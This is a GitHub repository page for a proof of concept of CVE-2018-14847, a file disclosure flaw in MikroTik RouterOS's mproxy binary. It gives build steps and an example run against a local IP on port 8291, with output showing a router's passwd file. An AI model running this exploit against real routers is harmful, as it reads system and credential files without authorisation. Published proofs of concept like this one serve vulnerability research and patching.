Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
routeros/poc/cve_2018_14847/
routeros/poc/cve_2018_14847/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
src
 
 
 
 

CVE-2018-14847 Proof of Concept

This is an implementation of CVE-2018-14847 which is a file disclosure vulnerability affecting the mproxy binary in Router OS up to 6.42.

Compilation

This code was tested on Ubuntu 18.04. Install the following dependencies:

sudo apt install libboost-all-dev cmake

To compile simply do the following:

cd routeros/poc/cve-2018-14847
mkdir build
cd build
cmake ..

Usage

albinolobster@ubuntu:~/routeros/poc/cve-2018-14847/build$ ./cve_2018_14847_poc --ip 192.168.1.103 --port 8291

=== File Contents (size: 69) ===
nobody:*:99:99:nobody:/tmp:/bin/sh
root::0:0:root:/home/root:/bin/sh